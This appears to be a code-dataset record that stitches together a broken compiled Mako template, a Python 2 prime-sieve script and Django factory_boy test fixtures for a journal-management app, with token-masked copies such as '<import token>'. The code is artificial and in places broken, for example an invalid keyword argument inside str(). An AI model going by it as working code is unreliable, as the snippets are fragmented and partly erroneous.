__M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<function token>\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\n<function token>\n<function token>\n<function token>\n<docstring token>\n", "<import token>\n<assignment token>\n<import token>\n<assignment token>\n<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<docstring token>\n" ]
false
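The module above is what mako emits when it compiles account.rentalcart.html; callers normally go through the template API instead of invoking render_body by hand. A minimal usage sketch with an inline template (illustrative only; rendering this particular compiled module would fail at the str(nowww = ...) line noted above, and file-based templates that inherit, like 'base_ajax.htm', additionally need a TemplateLookup):

from mako.template import Template

print(Template('hello ${name}!').render(name='world'))   # hello world!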
30
5771f49ad5254588f1683a8d45aa81ce472bb562
def prime_sieve(n):
    if n==2: return [2]
    elif n<2: return []
    s=range(3,n+1,2)
    mroot = n ** 0.5
    half=(n+1)/2-1
    i=0
    m=3
    while m <= mroot:
        if s[i]:
            j=(m*m-3)/2
            s[j]=0
            while j<half:
                s[j]=0
                j+=m
        i=i+1
        m=2*i+3
    return [2]+[x for x in s if x]

ps = prime_sieve(1000000)

def get_primes_upto(n):
    i = 0
    while ps[i] <= n:
        i += 1
    return ps[0:i+1];

def trial_division(n):
    if n == 1: return [1]
    primes = get_primes_upto(int(n**0.5) + 1)
    prime_factors = []

    for p in primes:
        if p*p > n: break
        while n % p == 0:
            prime_factors.append(p)
            n //= p
    if n > 1: prime_factors.append(n)

    return prime_factors

def unique_factors(n):
    return len(set(trial_division(n)))

fs = [0]
c = 0
for i in range(1,1000000):
    c+= 1
    fs.append(unique_factors(i))
    if len(fs) > 4:
        if fs[-4:] == [4,4,4,4]:
            print c -3
            break
[ "\ndef prime_sieve(n): \n\tif n==2: return [2]\n\telif n<2: return []\n\ts=range(3,n+1,2)\n\tmroot = n ** 0.5\n\thalf=(n+1)/2-1\n\ti=0\n\tm=3\n\twhile m <= mroot:\n\t\tif s[i]:\n\t\t\tj=(m*m-3)/2\n\t\t\ts[j]=0\n\t\t\twhile j<half:\n\t\t\t\ts[j]=0\n\t\t\t\tj+=m\n\t\ti=i+1\n\t\tm=2*i+3\n\treturn [2]+[x for x in s if x]\n\nps = prime_sieve(1000000)\n\ndef get_primes_upto(n):\n i = 0\n while ps[i] <= n:\n i += 1\n return ps[0:i+1];\n\ndef trial_division(n):\n if n == 1: return [1]\n primes = get_primes_upto(int(n**0.5) + 1)\n prime_factors = []\n \n for p in primes:\n if p*p > n: break\n while n % p == 0:\n prime_factors.append(p)\n n //= p\n if n > 1: prime_factors.append(n)\n \n return prime_factors\n\ndef unique_factors(n):\n return len(set(trial_division(n)))\n\nfs = [0]\nc = 0\nfor i in range(1,1000000):\n c+= 1\n fs.append(unique_factors(i))\n if len(fs) > 4:\n if fs[-4:] == [4,4,4,4]:\n print c -3\n break\n\n" ]
true
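The true error flag on this record is accurate: the source is Python 2 — `print c -3` is a print statement, `range()` is indexed and mutated like a list, and `/` floors on ints. A direct Python 3 port of the sieve alone, as a sketch under those readings (prime_sieve3 is a name introduced here):

def prime_sieve3(n):
    # Python 3 port: materialize range() so it can be mutated, use // for indices.
    if n == 2:
        return [2]
    if n < 2:
        return []
    s = list(range(3, n + 1, 2))
    mroot = n ** 0.5
    half = (n + 1) // 2 - 1
    i, m = 0, 3
    while m <= mroot:
        if s[i]:
            j = (m * m - 3) // 2
            s[j] = 0
            while j < half:
                s[j] = 0
                j += m
        i += 1
        m = 2 * i + 3
    return [2] + [x for x in s if x]

print(prime_sieve3(50))   # [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47]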
31
44d87f112ab60a202e4c8d64d7aec6f4f0d10578
# coding: utf-8
import os

import factory
import datetime

from journalmanager import models
from django.contrib.auth.models import Group
from django.core.files.base import File


_HERE = os.path.dirname(os.path.abspath(__file__))


# Fixture payloads shared by the factories below.
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:
    SAMPLE_XML = xml_file.read()


# The TIFF sample is binary data, so it is opened in binary mode; the file
# object is kept open because ArticleAssetFactory wraps it in File() below.
SAMPLE_TIFF_IMAGE = open(
    os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'), 'rb')


with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:
    SAMPLE_XML_RELATED = xml_file.read()


class UserFactory(factory.Factory):
    FACTORY_FOR = models.User

    @classmethod
    def _setup_next_sequence(cls):
        # Continue the sequence from the highest existing user id so that
        # repeated factory calls never collide with rows already in the DB.
        try:
            return cls._associated_class.objects.values_list(
                'id', flat=True).order_by('-id')[0] + 1
        except IndexError:
            return 0

    username = factory.Sequence(lambda n: "jmanager_username%s" % n)
    first_name = factory.Sequence(lambda n: "jmanager_first_name%s" % n)
    last_name = factory.Sequence(lambda n: "jmanager_last_name%s" % n)
    email = factory.Sequence(lambda n: "jmanager_email%[email protected]" % n)
    password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
    is_staff = False
    is_active = True
    is_superuser = False
    last_login = datetime.datetime(2000, 1, 1)
    date_joined = datetime.datetime(1999, 1, 1)


class GroupFactory(factory.Factory):
    FACTORY_FOR = Group

    name = factory.Sequence(lambda n: "Group #%s" % n)


class SubjectCategoryFactory(factory.Factory):
    FACTORY_FOR = models.SubjectCategory

    term = 'Acoustics'


class StudyAreaFactory(factory.Factory):
    FACTORY_FOR = models.StudyArea

    study_area = 'Health Sciences'


class SponsorFactory(factory.Factory):
    FACTORY_FOR = models.Sponsor

    name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
    address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
    Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
    email = '[email protected]'
    complement = ''


class UseLicenseFactory(factory.Factory):
    FACTORY_FOR = models.UseLicense

    license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
    reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
    disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'


class CollectionFactory(factory.Factory):
    FACTORY_FOR = models.Collection

    url = u'http://www.scielo.br/'
    name = factory.Sequence(lambda n: 'scielo%s' % n)
    address_number = u'430'
    country = u'Brasil'
    address = u'Rua Machado Bittencourt'
    email = u'[email protected]'
    name_slug = factory.Sequence(lambda n: 'scl%s' % n)


class JournalFactory(factory.Factory):
    FACTORY_FOR = models.Journal

    ctrl_vocabulary = u'decs'
    frequency = u'Q'
    scielo_issn = u'print'
    print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
    eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
    init_vol = u'1'
    title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
    title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
    short_title = u'ABCD.(São Paulo)'
    editorial_standard = u'vancouv'
    secs_code = u'6633'
    init_year = u'1986'
    acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
    pub_level = u'CT'
    init_num = u'1'
    subject_descriptors = u"""
        MEDICINA
        CIRURGIA
        GASTROENTEROLOGIA
        GASTROENTEROLOGIA""".strip()
    publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
    publisher_country = u'BR'
    publisher_state = u'SP'
    publication_city = u'São Paulo'
    editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
    editor_email = u'[email protected]'

    creator = factory.SubFactory(UserFactory)
    use_license = factory.SubFactory(UseLicenseFactory)


class SectionFactory(factory.Factory):
    FACTORY_FOR = models.Section

    code = factory.Sequence(lambda n: 'BJCE%s' % n)

    journal = factory.SubFactory(JournalFactory)


class LanguageFactory(factory.Factory):
    FACTORY_FOR = models.Language

    iso_code = 'pt'
    name = 'portuguese'


class IssueTitleFactory(factory.Factory):
    """
    ``issue`` must be provided
    """
    FACTORY_FOR = models.IssueTitle

    language = factory.SubFactory(LanguageFactory)
    title = u'Bla'


class IssueFactory(factory.Factory):
    FACTORY_FOR = models.Issue

    total_documents = 16
    number = factory.Sequence(lambda n: '%s' % n)
    volume = factory.Sequence(lambda n: '%s' % n)
    is_trashed = False
    publication_start_month = 9
    publication_end_month = 11
    publication_year = 2012
    is_marked_up = False
    suppl_text = '1'

    journal = factory.SubFactory(JournalFactory)

    @classmethod
    def _prepare(cls, create, **kwargs):
        # Every issue gets one freshly created Section attached to its
        # many-to-many relation right after the instance is prepared.
        section = SectionFactory()
        issue = super(IssueFactory, cls)._prepare(create, **kwargs)
        issue.section.add(section)
        return issue


class UserProfileFactory(factory.Factory):
    FACTORY_FOR = models.UserProfile

    user = factory.SubFactory(UserFactory)
    email_notifications = True


class SectionTitleFactory(factory.Factory):
    FACTORY_FOR = models.SectionTitle

    title = u'Artigos Originais'

    language = factory.SubFactory(LanguageFactory)
    section = factory.SubFactory(SectionFactory)


class RegularPressReleaseFactory(factory.Factory):
    FACTORY_FOR = models.RegularPressRelease

    issue = factory.SubFactory(IssueFactory)
    doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)


class AheadPressReleaseFactory(factory.Factory):
    FACTORY_FOR = models.AheadPressRelease

    journal = factory.SubFactory(JournalFactory)
    doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)


class PressReleaseTranslationFactory(factory.Factory):
    FACTORY_FOR = models.PressReleaseTranslation

    language = factory.SubFactory(LanguageFactory)
    press_release = factory.SubFactory(RegularPressReleaseFactory)
    title = u'Yeah, this issue is amazing!'
    content = u'Want to read more about...'


class PressReleaseArticleFactory(factory.Factory):
    FACTORY_FOR = models.PressReleaseArticle

    press_release = factory.SubFactory(RegularPressReleaseFactory)
    article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)


class ArticleFactory(factory.Factory):
    FACTORY_FOR = models.Article

    xml = SAMPLE_XML
    is_aop = False
    domain_key = factory.Sequence(
        lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
    journal_title = u'Revista de Saúde Pública'
    issn_ppub = u'0034-8910'
    issn_epub = u'1518-8787'
    xml_version = u'sps-1.2'
    article_type = u'research-article'
    doi = u'10.1590/S0034-8910.2014048004965'


class ArticleAssetFactory(factory.Factory):
    FACTORY_FOR = models.ArticleAsset

    article = factory.SubFactory(ArticleFactory)
    file = File(SAMPLE_TIFF_IMAGE)
    owner = u'SciELO'
    use_license = u'Creative Commons - BY'
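The factories above follow the pre-2.0 factory_boy convention (FACTORY_FOR on the class instead of the later Meta.model), under which calling a factory.Factory subclass creates and saves the associated Django model by default. The following is a minimal usage sketch of how a test case might consume them; the test class, method names, and assertions are illustrative assumptions and not part of the original module.

from django.test import TestCase


class FactoryUsageSketch(TestCase):
    """Illustrative only: exercises the factories defined above."""

    def test_journal_defaults(self):
        # Each call advances the factory's sequences, so generated ISSNs
        # and acronyms stay unique across instances.
        journal = JournalFactory()
        self.assertTrue(journal.pk)
        self.assertEqual(journal.frequency, u'Q')

    def test_issue_overrides_and_prepare_hook(self):
        # Keyword arguments override the factory's declared defaults.
        issue = IssueFactory(publication_year=2013, suppl_text='2')
        self.assertEqual(issue.publication_year, 2013)
        # IssueFactory._prepare attaches exactly one Section to the new issue.
        self.assertEqual(issue.section.count(), 1)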
[ "# coding: utf-8\nimport os\n\nimport factory\nimport datetime\n\nfrom journalmanager import models\nfrom django.contrib.auth.models import Group\nfrom django.core.files.base import File\n\n\n_HERE = os.path.dirname(os.path.abspath(__file__))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:\n SAMPLE_XML = xml_file.read()\n\n\nSAMPLE_TIFF_IMAGE = open(\n os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list(\n 'id', flat=True).order_by('-id')[0] + 1\n except IndexError:\n return 0\n\n username = factory.Sequence(lambda n: \"jmanager_username%s\" % n)\n first_name = factory.Sequence(lambda n: \"jmanager_first_name%s\" % n)\n last_name = factory.Sequence(lambda n: \"jmanager_last_name%s\" % n)\n email = factory.Sequence(lambda n: \"jmanager_email%[email protected]\" % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n\n name = factory.Sequence(lambda n: \"Group #%s\" % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \\\n Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. 
(São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\".strip()\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n editor_email = u'[email protected]'\n\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n\n title = u'Artigos Originais'\n\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(\n lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n 
article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n\n\n", "import os\nimport factory\nimport datetime\nfrom journalmanager import models\nfrom django.contrib.auth.models import Group\nfrom django.core.files.base import File\n_HERE = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\nSAMPLE_TIFF_IMAGE = open(os.path.join(_HERE, 'image_test',\n 'sample_tif_image.tif'))\nwith open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. 
/ Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n_HERE = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\nSAMPLE_TIFF_IMAGE = open(os.path.join(_HERE, 'image_test',\n 'sample_tif_image.tif'))\nwith 
open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%[email protected]' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" 